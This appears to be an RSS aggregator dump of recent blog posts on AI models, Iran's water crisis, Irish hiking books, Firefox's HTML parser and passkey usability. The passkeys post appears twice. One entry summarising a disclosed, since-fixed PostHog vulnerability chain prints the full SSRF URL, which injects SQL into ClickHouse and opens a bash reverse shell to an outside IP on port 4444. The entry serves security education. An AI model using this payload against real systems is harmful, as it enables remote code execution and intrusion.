Feeds generated at 2025-12-18 10:14:43.387990583 +0000 UTC m=+2161423.881118034

After Ruining a Treasured Water Resource, Iran Is Drying Up

2025-12-18T04:40:00-05:00 from Yale E360

Iran is looking to relocate the nation’s capital because of severe water shortages that make Tehran unsustainable. Experts say the crisis was caused by years of ill-conceived dam projects and overpumping that destroyed a centuries-old system for tapping underground reserves.

Read more on E360 →

Fake "web browsers" and their (lack of) HTTP headers: some notes

2025-12-18T03:34:24Z from Chris's Wiki :: blog

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain

2025-12-18T01:42:22+00:00 from Simon Willison's Weblog

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain

Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.

The way in abuses a webhooks system with non-robust URL validation, setting up a SSRF (Server-Side Request Forgery) attack where the server makes a request against an internal network resource.

Here's the URL that gets injected:

http://clickhouse:8123/?query=SELECT++FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+>%26+/dev/tcp/172.31.221.180/4444+0>%261\\"$$;SELECT++FROM+cmd_exec;+--\",'posthog','posthog')#

Reformatted a little for readability:

http://clickhouse:8123/?query=
SELECT *
FROM postgresql(
    'db:5432',
    'posthog',
    "posthog_use')) TO STDOUT;
    END;
    DROP TABLE IF EXISTS cmd_exec;
    CREATE TABLE cmd_exec (
        cmd_output text
    );
    COPY cmd_exec
    FROM PROGRAM $$
        bash -c \"bash -i >& /dev/tcp/172.31.221.180/4444 0>&1\"
    $$;
    SELECT * FROM cmd_exec;
    --",
    'posthog',
    'posthog'
)
#

This abuses ClickHouse's ability to run its own queries against PostgreSQL using the postgresql() table function, combined with an escaping bug in ClickHouse PostgreSQL function (since fixed). Then that query abuses PostgreSQL's ability to run shell commands via COPY ... FROM PROGRAM.

The bash -c bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.

Via Hacker News

Tags: postgresql, security, webhooks, clickhouse

AoAH Day 15: Porting a complete HTML5 parser and browser test suite

2025-12-17T23:23:35+00:00 from Simon Willison's Weblog

AoAH Day 15: Porting a complete HTML5 parser and browser test suite

Anil Madhavapeddy is running an Advent of Agentic Humps this year, building a new useful OCaml library every day for most of December.

Inspired by Emil Stenström's JustHTML and my own coding agent port of that to JavaScript he coined the term vibespiling for AI-powered porting and transpiling of code from one language to another and had a go at building an HTML5 parser in OCaml, resulting in html5rw which passes the same html5lib-tests suite that Emil and myself used for our projects.

Anil's thoughts on the copyright and ethical aspects of this are worth quoting in full:

The question of copyright and licensing is difficult. I definitely did some editing by hand, and a fair bit of prompting that resulted in targeted code edits, but the vast amount of architectural logic came from JustHTML. So I opted to make the LICENSE a joint one with Emil Stenström. I did not follow the transitive dependency through to the Rust one, which I probably should.

I'm also extremely uncertain about every releasing this library to the central opam repository, especially as there are excellent HTML5 parsers already available. I haven't checked if those pass the HTML5 test suite, because this is wandering into the agents vs humans territory that I ruled out in my groundrules. Whether or not this agentic code is better or not is a moot point if releasing it drives away the human maintainers who are the source of creativity in the code!

I decided to credit Emil in the same way for my own vibespiled project.

Via @avsm

Tags: definitions, functional-programming, ai, generative-ai, llms, ai-assisted-programming, ai-ethics, vibe-coding, ocaml

The Resonant Computing Manifesto: same AI slop, same AI guys

Wed, 17 Dec 2025 22:47:15 +0000 from Pivot to AI

Back in the 1990s, in the first flowering of the World Wide Web, the Silicon Valley guys were way into their manifestos. “A Declaration of the Independence of Cyberspace”! The “Cluetrain Manifesto!” [EFF; Cluetrain Manifesto] The manifestos were feel-good and positive — until you realised the guys writing them were Silicon Valley libertarians. The “Declaration […]

Gemini 3 Flash

2025-12-17T22:44:52+00:00 from Simon Willison's Weblog

It continues to be a busy December, if not quite as busy as last year. Today's big news is Gemini 3 Flash, the latest in Google's "Flash" line of faster and less expensive models.

Google are emphasizing the comparison between the new Flash and their previous generation's top model Gemini 2.5 Pro:

Building on 3 Pro’s strong multimodal, coding and agentic features, 3 Flash offers powerful performance at less than a quarter the cost of 3 Pro, along with higher rate limits. The new 3 Flash model surpasses 2.5 Pro across many benchmarks while delivering faster speeds.

Gemini 3 Flash's characteristics are almost identical to Gemini 3 Pro: it accepts text, image, video, audio, and PDF, outputs only text, handles 1,048,576 maximum input tokens and up to 65,536 output tokens, and has the same knowledge cut-off date of January 2025 (also shared with the Gemini 2.5 series).

The benchmarks look good. The cost is appealing: 1/4 the price of Gemini 3 Pro ≤200k and 1/8 the price of Gemini 3 Pro >200k, and it's nice not to have a price increase for the new Flash at larger token lengths.

It's a little more expensive than previous Flash models - Gemini 2.5 Flash was $0.30/million input tokens and $2.50/million on output, Gemini 3 Flash is $0.50/million and $3/million respectively.

Here's a more extensive price comparison on my llm-prices.com site.

Generating some SVGs of pelicans

I released llm-gemini 0.28 this morning with support for the new model. You can try it out like this:

llm install -U llm-gemini
llm keys set gemini # paste in key
llm -m gemini-3-flash-preview "Generate an SVG of a pelican riding a bicycle"

According to the developer docs the new model supports four different thinking level options: minimal, low, medium, and high. This is different from Gemini 3 Pro, which only supported low and high.

You can run those like this:

llm -m gemini-3-flash-preview --thinking-level minimal "Generate an SVG of a pelican riding a bicycle"

Here are four pelicans, for thinking levels minimal, low, medium, and high:

A minimalist vector illustration of a stylized white bird with a long orange beak and a red cap riding a dark blue bicycle on a single grey ground line against a plain white background.

Minimalist illustration: A stylized white bird with a large, wedge-shaped orange beak and a single black dot for an eye rides a red bicycle with black wheels and a yellow pedal against a solid light blue background.

A minimalist illustration of a stylized white bird with a large yellow beak riding a red road bicycle in a racing position on a light blue background.

Minimalist line-art illustration of a stylized white bird with a large orange beak riding a simple black bicycle with one orange pedal, centered against a light blue circular background.

I built the gallery component with Gemini 3 Flash

The gallery above uses a new Web Component which I built using Gemini 3 Flash to try out its coding abilities. The code on the page looks like this:

<image-gallery width="4">
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-minimal-pelican-svg.jpg" alt="A minimalist vector illustration of a stylized white bird with a long orange beak and a red cap riding a dark blue bicycle on a single grey ground line against a plain white background." />
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-low-pelican-svg.jpg" alt="Minimalist illustration: A stylized white bird with a large, wedge-shaped orange beak and a single black dot for an eye rides a red bicycle with black wheels and a yellow pedal against a solid light blue background." />
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-medium-pelican-svg.jpg" alt="A minimalist illustration of a stylized white bird with a large yellow beak riding a red road bicycle in a racing position on a light blue background." />
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-high-pelican-svg.jpg" alt="Minimalist line-art illustration of a stylized white bird with a large orange beak riding a simple black bicycle with one orange pedal, centered against a light blue circular background." />
</image-gallery>

Those alt attributes are all generated by Gemini 3 Flash as well, using this recipe:

llm -m gemini-3-flash-preview --system '
You write alt text for any image pasted in by the user. Alt text is always presented in a
fenced code block to make it easy to copy and paste out. It is always presented on a single
line so it can be used easily in Markdown images. All text on the image (for screenshots etc)
must be exactly included. A short note describing the nature of the image itself should go first.' \
-a https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-high-pelican-svg.jpg

You can see the code that powers the image gallery Web Component here on GitHub. I built it by prompting Gemini 3 Flash via LLM like this:

llm -m gemini-3-flash-preview '
Build a Web Component that implements a simple image gallery. Usage is like this:

<image-gallery width="5">
  <img src="image1.jpg" alt="Image 1">
  <img src="image2.jpg" alt="Image 2" data-thumb="image2-thumb.jpg">
  <img src="image3.jpg" alt="Image 3">
</image-gallery>

If an image has a data-thumb= attribute that one is used instead, other images are scaled down. 

The image gallery always takes up 100% of available width. The width="5" attribute means that five images will be shown next to each other in each row. The default is 3. There are gaps between the images. When an image is clicked it opens a modal dialog with the full size image.

Return a complete HTML file with both the implementation of the Web Component several example uses of it. Use https://picsum.photos/300/200 URLs for those example images.'

It took a few follow-up prompts using llm -c:

llm -c 'Use a real modal such that keyboard shortcuts and accessibility features work without extra JS'

llm -c 'Use X for the close icon and make it a bit more subtle'

llm -c 'remove the hover effect entirely'

llm -c 'I want no border on the close icon even when it is focused'

Here's the full transcript, exported using llm logs -cue.

Those five prompts took:

225 input, 3,269 output
2,243 input, 2,908 output
4,319 input, 2,516 output
6,376 input, 2,094 output
8,151 input, 1,806 output

Added together that's 21,314 input and 12,593 output for a grand total of 4.8436 cents.

The guide to migrating from Gemini 2.5 reveals one disappointment:

Image segmentation: Image segmentation capabilities (returning pixel-level masks for objects) are not supported in Gemini 3 Pro or Gemini 3 Flash. For workloads requiring native image segmentation, we recommend continuing to utilize Gemini 2.5 Flash with thinking turned off or Gemini Robotics-ER 1.5.

I wrote about this capability in Gemini 2.5 back in April. I hope they come back in future models - they're a really neat capability that is unique to Gemini.

Tags: google, ai, web-components, generative-ai, llms, llm, gemini, llm-pricing, pelican-riding-a-bicycle, llm-release

Warner Doesn’t Trust Paramount

Wed, 17 Dec 2025 19:05:32 GMT from Matt Levine - Bloomberg Opinion Columnist

Revocable trusts, ESG side letters, IPO lockups, Destiny and doing deals over the holidays.

My favourite Irish Guidebooks & Practical Guides Tough Soles on Books

Wed, 17 Dec 2025 14:28:48 +0000 from Tough Soles Blog

My passion is the mountains, but my second love is books.

Before I had the means, knowledge, or even the want to explore the hills, I was escaping into the worlds found between two pages. Books have been with me all my life, and have taken me from lofty peaks on a dragons back, the whole way through a winding research masters exploring how long distance walking affects our understanding of connection and sense of place.

I think some of this love has seeped into Tough Soles in small ways - there are always books mentioned in my Gift Guides, and on my monthly round ups on instagram I have a book of the month. But I have so much more to share on books on the outdoors - be it the inspiration found in novels of personal outdoor experiences; the enabling power of guides and books on the practical skills of outdoor exploration; or the educational layers in books on how something as seemingly innocuous as walking has informed our cultures and modern infrastructure.

So this is episode one of that series, and we’re starting easy with some guidebooks for Ireland and practical books that I’ve used a lot in recent years.

Irish Guides & Practical Books

These books have helped me learn more about the natural world around me, and how to explore it better

Guidebooks

1. Wanderlust: British And Irish Isles by Gestalten

If you are looking for something truly beautiful, this is the book for you. This is a beautifully curated book of trails across Ireland and the UK, and features several of the classic Irish long distance hikes. It fits perfectly into the coffee table book genre, being large format and printed only in hardback (a paperback couldn’t support the weight of it all).

Alex Roddie is the writer hired by Gestalten for this project, and from my experience he’s a great authority and researcher on trails.

Find this book in Irish bookshops:
Kennys | Easons | Dubray
Gestalten’s own online store

2. Irish Peaks by Mountaineering Ireland

If Wanderlust was a book of beauty, then this is the brains. A 256-page hardcover guidebook featuring 71 hillwalking routes across the island of Ireland, this book is the most comprehensive guide you will find for the Irish hills. Based on the MountainViews list of Ireland’s Highest Hundred Mountains, the routes recommended are ones that have been tried and tested by walking clubs all over Ireland.

This book is currently in its second edition, and I know that it is almost sold out, so if it’s something you’ve been interested in, I’d recommend getting it sooner rather than later.

Find this book in Irish bookshops:
Charlie Byne | Great Outdoors
From the Irish Peaks website

3. The Hike Life: My Favourite 50 Hikes in Ireland by Rozanna Purcell
& 4. The Hike Life: 50 More to Explore by Rozanna Purcell

These two books might be the most interesting guidebooks I’ve seen post-covid. If you’re not Irish, you won’t necessarily know this - but covid was the catalyst for a really big shift in the Irish population’s engagement with the outdoors. Going hiking shifted from something of a niche activity, to something that everyone was trying. And with that came a slew of guidebooks and online lists.

As I read more and more of these “1000 hidden gems” books, it sometimes felt like the creators were including as much information as possible, in hope that quantity would be the main selling point. However, in The Hike Life books, the list of trails is very well curated, and the balance of imagery to info is very readable. As someone who is known for knowing every trail around the country, it was cool for me to find quite a few that I’d never heard of, that still looked like quality walking.

Find book one in Irish bookshops:
Kennys | Easons | Dubray

Find book two in Irish bookshops:
Kennys | Easons | Dubray

5. Ireland's county high points by Kieron Gribbon

What really makes this book stand out is that it’s the only one! The County High Points of Ireland is a really popular hiking list to take on, which means that if you’re looking for something in print, this book is what you’ll find.

I like that it’s small, light and easy to carry. The paper is somewhat glossy, meaning it’s less susceptible to the elements than just standard paper. It often focused on the quickest route, which for many people might be what they want (as well as these are often access roads, which means that access issues are less likely to occur). I think there’s room for another book that expands a bit on the history and potential other routes.

Find this book in Irish bookshops:
Kennys | Gill Books

Information books

1. The Wildflowers of Ireland: A Field Guide by Zoe Devlin

This has to be one of my favourite little guidebooks. As someone who knows some plants, but was otherwise completely lost, this has been a game changer. It’s really easy to use - all the pages are organised by flower colour, and then petal shape. It’s great for any level of outdoor connection: whether you’re like me, and need to broaden your flora knowledge as you train to become an outdoor leader; or this might be perfect for your granny who just wants to know more about what she sees wild in the field beside her house. I’ve given this book as a gift to many people, and will continue to.

Find this book in Irish bookshops:
Kennys | Easons | Dubray

2. Rock Climbing by Libby Peter

Carl and I recently did some outdoor climbing training, and bought this book off the back of a recommendation from a climbing friend. It is really comprehensive with easy to read language, and as we’ve learnt new skills we’ve been adding tabs to the relevant pages. This book covers everything from gym climbing, techniques, abseiling, trad climbing, and all of the rope work associated with it all.

Find this book in Irish bookshops:
Easons | Dubray

3. Loughcrew: The Cairns by Jean McMann

Back in March I went to Loughcrew for the Equinox, as the tomb there lines up with the sunrise each year. Down in the Megalithic Centre they have a host of books on the area and ancient Ireland, and that is where I picked up this little book. I love the feeling it gives of an old academic journal - the page margins and diagrams are all aligned as such. Something that I appreciate is that it’s short. While I wanted to learn more about the history of the area, I know myself well enough that I’m not going to finish something long and technical. This was the perfect length for me.

I bought this book at the Loughcrew Megalithic Centre

4. The Mountain Leader by Mike Raine

If you’re getting into the Mountain Leader world, this is a really easy book to read - you’re not going to have a headache after half an hour of technical language. It covers many of the topics in a relaxed manor, helping you build up knowledge and ideas for a future of guiding.

Find this book in Irish bookshops:
River Deep Mountain High (IE) | Mike Raine (UK)

5. The Complete Walker IV by Colin Fletcher & Chip Rawlins

This book is on the list less as a specific recommendation, and more as a genre recommendation. Originally published in 1968 (with my edition printed in 2002), this book is an in-depth guide to backpacking. Throughout this tomb you’ll learn about kinds of tents, stoves, backpack frames, weight distribution - the list goes on. The reason I include it is that much of the basic information is still relevant to the outdoor world today. While much of the equipment has moved on to more waterproof, lighter, or durable technologies, the basics are the same, and it’s really interesting to learn about what came before. It gives me a deeper appreciation for the equipment I have today, and why equipment now looks the way it does.

Find this book out in the wilds of a second hand bookshop or gear swap

How did IRC ping timeouts end up in a lawsuit?

2025-12-17T13:17:23Z from Matthew Garrett

How did IRC ping timeouts end up in a lawsuit?

2025-12-17T13:17:23Z from Matthew Garrett

Warming Responsible for Two-Thirds of Emissions from Western Wildfires

2025-12-17T06:35:00-05:00 from Yale E360

Warming is fueling ever larger wildfires in the U.S. West, which are becoming a major source of pollution. A new study finds that warming is to blame for nearly half of particulate pollution and two-thirds of emissions unleashed by western wildfires.

Read more on E360 →

The palm tree that led to Palmyra

2025-12-17T09:48:51+00:00 from alexwlchan

Palmyrene is an alphabet that was used to write Aramaic in 300–100 BCE, and I learnt about it while looking for a palm tree emoji.

What an error log level should mean (a system administrator's view)

2025-12-17T03:08:34Z from Chris's Wiki :: blog

firefox parser/html/java/README.txt

2025-12-17T01:48:54+00:00 from Simon Willison's Weblog

firefox parser/html/java/README.txt

TIL (or TIR - Today I was Reminded) that the HTML5 Parser used by Firefox is maintained as Java code (commit history here) and converted to C++ using a custom translation script.

You can see that in action by checking out the ~8GB Firefox repository and running:

cd parser/html/java
make sync
make translate

Here's a terminal session where I did that, including the output of git diff showing the updated C++ files.

I did some digging and found that the code that does the translation work lives, weirdly, in the Nu Html Checker repository on GitHub which powers the W3C's validator.w3.org/nu/ validation service!

Here's a snippet from htmlparser/cpptranslate/CppVisitor.java showing how a class declaration is converted into C++:

    protected void startClassDeclaration() {
        printer.print("#define ");
        printer.print(className);
        printer.printLn("_cpp__");
        printer.printLn();

        for (int i = 0; i < Main.H_LIST.length; i++) {
            String klazz = Main.H_LIST[i];
            if (!klazz.equals(javaClassName)) {
                printer.print("#include \"");
                printer.print(cppTypes.classPrefix());
                printer.print(klazz);
                printer.printLn(".h\"");
            }
        }

        printer.printLn();
        printer.print("#include \"");
        printer.print(className);
        printer.printLn(".h\"");
        printer.printLn();
    }

Here's a fascinating blog post from John Resig explaining how validator author Henri Sivonen introduced the new parser into Firefox in 2009.

Via Hacker News conversation

Tags: c-plus-plus, firefox2, henri-sivonen, java, john-resig, mozilla

Yep, Passkeys Still Have Problems

Wed, 17 Dec 2025 00:00:00 +0000 from Firstyear's blog-a-log

It's now late into 2025, and just over a year since I wrote my last post on Passkeys. The prevailing dialogue that I see from thought leaders is "addressing common misconceptions" around Passkeys, the implication being that "you just don't understand it correctly" if you have doubts. Clearly I don't understand Passkeys in that case.

And yet, I am here to once again say - yep, it's 2025 and Passkeys still have all the issues I've mentioned before, and a few new ones I've learnt! Let's round up the year together then.

Too Lazy - Didn't Read

Passkeys have flaws - learn about them and use them on your terms. Don't write them off wholesale based on this blog. I, the author of this blog, use Passkeys!!!
DO engage with and learn about Credential Managers (aka Password Managers). This is where the Passkey is stored.
DO use a Credential Manager you control and can backup. I recommend Bitwarden or Vaultwarden which allow backups to be taken easily.
AVOID using a platform (Apple, Google, Microsoft) Credential Manager as your only Passkey repository - these can't easily backed up and you CAN be locked out permanently.
- IF you use a platform Passkey manager, frequently sync it with FIDO Credential Exchange to an external Credential Manager you can backup/control.
- OR use both the platform Passkey manager AND a Credential Manager you control in parallel.
For high value accounts such as email which are on the account recovery path
- DO use Yubikeys for your email account as the Passkey store.
- DO keep strong machine generated passwords + TOTP in your Credential Managers as alternatives to Passkeys for your email accounts.
DO a thought experiment - if I lost access to my Credential Manager what is the recovery path? Ensure you can rebuild from disaster.

So what has changed?

The major change in the last 12 months has been the introduction of the FIDO Credential Exchange Specification.

Most people within the tech community who have dismissed my claim that "Passkeys are a form of vendor lockin" are now pointing at this specification as proof that this claim is now wrong.

"See! Look! You can export your credentials to another Passkey provider if you want! We aren't locking you in!!!"

I have to agree - this is great if you want to change which garden you live inside. However it doesn't help with the continual friction that exists using Passkeys, or the challenges of day to day usage of Passkeys when you have devices from different ecosystems.

So it's very realistic that a user may end up with fragmented Passkeys between their devices, and they may end up not aware they can make this jump between providers, or that they could consolidate their credentials to a single Credential Manager. This ends up in the same position where even though the user could change provider, they may end up feeling locked into one provider because they aren't given the information they need to make an informed decision about how they could use other Credential Managers.

For example, I think it would be very realistic to assume that some users may feel that their Passkeys are bound to only their phone. Or that since their phone was the first device to have Passkeys, that's "just where the Passkeys live".

Let's address one of the biases here - I've been heavily affected by the Apple side of this problem where any Passkeys from Apple's devices can't sync to a non-Apple device. Other vendors often can allow you to sync out of their ecosystem - Microsoft Password Manager and Google Password Manager for example may allow you to sync to other devices (from information I was told on 2025-12-18, that I have partially confirmed, I could still be wrong - and often am.).

This means that for Apple users, you may feel a bit more "trapped" if you use their platform Passkeys compared to other vendors.

What's the same?

Passkeys Are Still Hard to Conceptualise

Passwords for all their security flaws are easy for a person to grasp. "Something only I know!".

SMS 2FA is easy to use - wait for the message and type in the code. "Something only I can receive".

Yes I know SMS isn't secure, don't come at me.

Beyond that we start to face challenges.

Storing a password into a Credential Manager is an act of trust. Knowing that you dont know the password any more. Knowing you only have to know the password to access the Credential Manager. Being able to conceptualise that storage process and trust it. I can at least see the random password in the Credential Manager so it brings a feeling of safety. I can print that out and it would be annoying but I guess I could type it back in. But it's something I can still conceptualise.

From there TOTP in a Credential Manager is not a difficult jump to make. You can see that random seed, the number changing every 30 seconds, and I already trust the Credential Manager to save my passwords. It's not hard to start to trust TOTP too at this point.

So what about a Passkey?

Passkeys don't have anything tangible I can observe - how are they working? Compared to the Password I can't "see" what makes it secure. I only have the words on the screen to go by. I can't even print it out and keep a copy in case of a disaster.

But moreover, what if I'd never gotten past SMS 2FA - what if I had never used a Credential Manager and learnt to understand and trust how they work? Now suddenly I am on a bigger journey. I now have to shift from "something I know" to "something I trust", without the intermediate steps in the process.

And asking users to trust something that they can't see inside of is a big request. Even today I still get questions from smart security invested technical persons about how Passkeys work. If this confuses security engineers, what about people in other areas with different areas of expertise?

Thought Leadership

Today I saw this excellent quote in the context of why Passkeys are better than Password and TOTP in a Password Manager:

Individuals having to learn to use password management software and be vigilant against phishing is an industry failure, not a personal success.

Even giving as much benefit of the doubt to this statement, and that the "and" might be load bearing we have to ask - Where are passkeys stored?

So we still have to teach individuals about password (credential) managers, and how Passkeys work so that people trust them. That fundamental truth hasn't changed. But this also adds a natural barrier to Passkey adoption - the same barriers which have affected Credential Manager adoption for the last decade or so.

Not only this - if a person is choosing a password and TOTP over a Passkey (or even recommending them), we have to ask "why is that"? Do we think that it's truly about arrogance? Do we think that this user believes they are more important? Or is there an underlying usability issue at play?

Do we really think that Passkeys come without needing user education? To me it feels like this comment is overlooking the barriers that Passkeys naturally come with.

Maybe I'm fundamentally missing the original point of this comment. Maybe I am completely misinterpretting it. But I still think we need to say if a person chooses password and TOTP over a Passkey even once they are informed of the choices, then Passkeys have failed that user. What could we have done better?

Perhaps one could interpret this statement as you don't need to teach users about Passkeys if they are using their ✨ m a g i c a l ✨ platform Passkey manager since it's so much nicer than a password and TOTP and it just works. And that leads to ...

It's Still Vendor Lockin

In economics, vendor lock-in, [...] makes a customer dependent on a vendor for products, unable to use another vendor without substantial switching costs.

citation - wikipedia

See, the big issue that the thought leaders seem to get wrong is that they believe that if you can use FIDO Credential Exchange, then you aren't locked in because you can move between Passkey providers.

The issue is when you try to go against the platform manager, it's the continual friction at each stage of the users experience. It makes the cost to switch high because at each point you encounter friction if you deviate from the vendors intended paths.

For example, consider the Apple Passkey modal:

MacOS 15.7.1 taken on 2025-10-29

The majority of this modal is dedicated to "you should make a Passkey in your Apple Keychain". If you want to use your Android phone or a Security Key, where would I click? Oh yes, Other Options.

Per Apple's Human Interface Guidelines:

Make buttons easy for people to use. It’s essential to include enough space around a button so that people can visually distinguish it from surrounding components and content. Giving a button enough space is also critical for helping people select or activate it, regardless of the method of input they use.

MacOS 15.7.1 taken on 2025-10-29

When you select Other Options this is what you see - see how Touch ID is still the default, despite the fact that I already indicated I don't want to use it by selecting Other Options? At this point I would need to select Security Key and then click again to use my key. Similar for Android Phone.

And guess what - my preferences and choices are never remembered. I guess it's true what they say.

Software engineers don't understand consent, and it shows.

Google Chrome has a similar set of Modals and nudges (though props to Chrome, they at least implicitly activate your security key from the first modal so a power user who knows the trick can use it). So they are just as bad here IMO.

This is what I mean by "vendor lockin". It's not just about where the private keys are stored. It's the continual friction at each step of the interaction when you deviate from the vendors intended path. It's about making it so annoying to use anything else that you settle into one vendors ecosystem. It's about the lack of communication about where Passkeys are stored that tricks users into settling into their vendor ecosystem. That's vendor lock-in.

Cloud Keychains Are Still Blowing Up Data

We still get reports of people losing Passkeys from Apple Keychain. We similarly get reports of Android phones that one day just stop creating new Passkeys, or stop being able to use existing ones. One exceptional story we saw recently was of an Android device that stopped using it's onboard Passkeys and also stopped accepting NFC key. USB CTAP would still function, and all the historical fixes we've seen (such as full device resets) would not work. So now what? I'm not sure of the outcome of this story, but my assumption is there was not a happy ending.

If someone ends up locked out of their accounts because their Passkeys got nuked silently, what are we meant to do to help them? How will they ever trust Passkeys again?

Vendors Can Lock You Out

Dr Paris Buttfield-Addison was locked out of their Apple account.

I recommend you read the post, but the side effect - every Passkey they had in an Apple keychain is now unrecoverable.

There is just as much evidence about the same account practices with Google and Microsoft.

I honestly don't think I have to say much else, this is terrifying that every account you own could be destroyed by a single action where you have no recourse.

Authentication Providers Still Miscommunicate

We still have issues where services that are embracing Passkeys are communicating badly about them. The gold standard of miscommunication came to me a few months ago infact (2025-10-29) when a company emailed me this statement:

Passkeys use your unique features – known as biometrics – like your facial features, your fingerprint or a PIN to let us know that it’s really you. They provide increased security because unlike a password or username, they can’t be shared with anyone, making them phishing resistant.

As someone who is deeply aware of how webauthn works I know that my facial features or fingerprint never really leave my device. However asking my partner (context: my partner is a veternary surgeon, and so I feel justified in claiming that she is a very intelligent and educated woman) to read this, her interpretation was:

So this means a Passkey sends my face or fingerprint over the internet for the service to verify? Is that also why they believe it is phishing resistant because you can't clone my face or my fingerprint?

This is a smart, educated person, with the title of doctor, and even she is concluding that Passkeys are sending biometrics over the internet. What are people in other disciplines going to think? What about people with a cognitive impairment or who do not have access to education about Passkeys?

This kind of messaging that leads people to believe we are sending personal physical features over the internet is harmful because most people will not want to send these data to a remote service. This completely undermines the trust in Passkeys because we are establishing to people that they are personally invasive in a way that username and passwords are not!

And guess what - platform Passkey provider modals/dialogs don't do anything to counter this information and often leave users with the same feeling.

Authentication Providers Are Still Playing Silly Games With User Choice

A past complaint was that I had encountered services that only accepted a single Passkey as they assumed you would use a synchronised cloud keychain of some kind. In 2025 I still see a handful of these services, but mostly the large problem sites have now finally allowed you to enrol multiple Passkeys.

But that doesn't stop sites pulling tricks on you.

I've encountered multiple sites that now use authenticatorAttachment options to force you to use a platform bound Passkey. In other words, they force you into Microsoft, Google or Apple. No password manager, no security key, no choices.

I won't claim this one as an attempt at "vendor lockin" by the big players, but it is a reflection of what developers believe a Passkey to be - they believe it means a private key stored in one of those vendors devices, and nothing else. So much of this comes from the confused historical origins of Passkeys and we aren't doing anything to change it.

When I have confronted these sites about the mispractice, they pretty much shrugged and said "well no one else has complained so meh". Guess I won't be enrolling a Passkey with you then.

One other site that pulled this said "instead of selecting continue, select this other option and you get the authenticatorAttachment=cross-platform setting. Except that they could literally do nothing with authenticatorAttachment and leave it up to the platform modals allowing me the choice (and fewer friction burns) of choosing where I want to enrol my Passkey.

Another very naughty website attempts to enroll a Passkey on your device with no prior warning or consent when you login, which is very surprising to anyone and seems very deceptive as a practice. Ironically same vendor doesn't use your passkey when you go to sign in again anyway.

Conclusion

Yep, Passkeys Still Have Problems.

But it's not all doom and gloom.

Most of the issues are around platform Passkey providers like Apple, Microsoft or Google, where the power balance is shifted against you as a user.

The best thing you can do as a user, and for anyone in your life you want to help, is to be educated about Credential Managers. Regardless of Passwords, TOTP, Passkeys or anything else, empowering people to manage and think about their online security via a Credential Manager they feel they control and understand is critical - not an "industry failure".

Using a Credential Manager that you have control over shields you from the account lockout and platform blow-up risks that exist with platform Passkeys. Additionally most Credential Managers will allow you to backup your credentials too. It can be a great idea to do this every few months and put the content onto a USB drive in a safe location.

If you do choose to use a platform Passkey provider, you can "emulate" this backup ability by using the credential export function to another Passkey provider, and then do the backups from there.

You can also use a Yubikey as a Credential Manager if you want - modern keys (firmware version 5.7 and greater) can store up to 150 Passkeys on them, so you could consider skipping software Credential Managers entirely for some accounts.

The most critical accounts you own though need some special care. Email is one of those - email generally is the path by which all other credential resets and account recovery flows occur. This means losing your email access is the most devastating loss as anything else could potentially be recovered.

For email, this is why I recommend using hardware security keys (yubikeys are the gold standard here) if you want Passkeys to protect your email. Always keep a strong password and TOTP as an extra recovery path, but don't use it day to day since it can be phished. Ensure these details are physically secure and backed up - again a USB drive or even a print out on paper in a safe and secure location so that you can "bootstrap your accounts" in the case of a major failure.

If you are an Apple or Google employee - change your dialogs to allow remembering choices the user has previously made on sites, or wholesale allow skipping some parts - for example I want to skip straight to Security Key, and maybe I'll choose to go back for something else. But let me make that choice. Similar, make the choice to use different Passkey providers a first-class citizen in the UI, not just a tiny text afterthought.

If you are a developer deploying Passkeys, then don't use any of the pre-filtering Webauthn options or javascript API's. Just leave it to the users platform modals to let the person choose. If you want people to enroll a passkey on sign in, communicate that before you attempt the enrolment. Remember kids, consent is paramount.

But of course - maybe I just "don't understand Passkeys correctly". I am but an underachiving white man on the internet after all.

EDIT: 2025-12-17 - expanded on the password/totp + password manager argument.

EDIT: 2025-12-18 - updated the FIDO credential exchange and lock in sections based on some new information.

Yep, Passkeys Still Have Problems

Wed, 17 Dec 2025 00:00:00 +0000 from Firstyear's blog-a-log

And yet, I am here to once again say - yep, it's 2025 and Passkeys still have all the issues I've mentioned before, and a few new ones I've learnt! Let's round up the year together then.

Too Lazy - Didn't Read

Passkeys have flaws - learn about them and use them on your terms. Don't write them off wholesale based on this blog. I, the author of this blog, use Passkeys!!!
DO engage with and learn about Credential Managers (aka Password Managers). This is where the Passkey is stored.
DO use a Credential Manager you control and can backup. I recommend Bitwarden or Vaultwarden which allow backups to be taken easily.
AVOID using a platform (Apple, Google, Microsoft) Credential Manager as your only Passkey repository - these can't easily backed up and you CAN be locked out permanently.
- IF you use a platform Passkey manager, frequently sync it with FIDO Credential Exchange to an external Credential Manager you can backup/control.
- OR use both the platform Passkey manager AND a Credential Manager you control in parallel.
For high value accounts such as email which are on the account recovery path
- DO use Yubikeys for your email account as the Passkey store.
- DO keep strong machine generated passwords + TOTP in your Credential Managers as alternatives to Passkeys for your email accounts.
DO a thought experiment - if I lost access to my Credential Manager what is the recovery path? Ensure you can rebuild from disaster.

So what has changed?

The major change in the last 12 months has been the introduction of the FIDO Credential Exchange Specification.

Most people within the tech community who have dismissed my claim that "Passkeys are a form of vendor lockin" are now pointing at this specification as proof that this claim is now wrong.

"See! Look! You can export your credentials to another Passkey provider if you want! We aren't locking you in!!!"

Let's address one of the biases here - I've been heavily affected by the Apple side of this problem where any Passkeys from Apple's devices can't sync to a non-Apple device. Other vendors often can allow you to sync out of their ecosystem - Microsoft Password Manager and Google Password Manager for example may allow you to sync to other devices (from information I was told on 2025-12-18, that I have partially confirmed, I could still be wrong - and often am.).

This means that for Apple users, you may feel a bit more "trapped" if you use their platform Passkeys compared to other vendors.

What's the same?

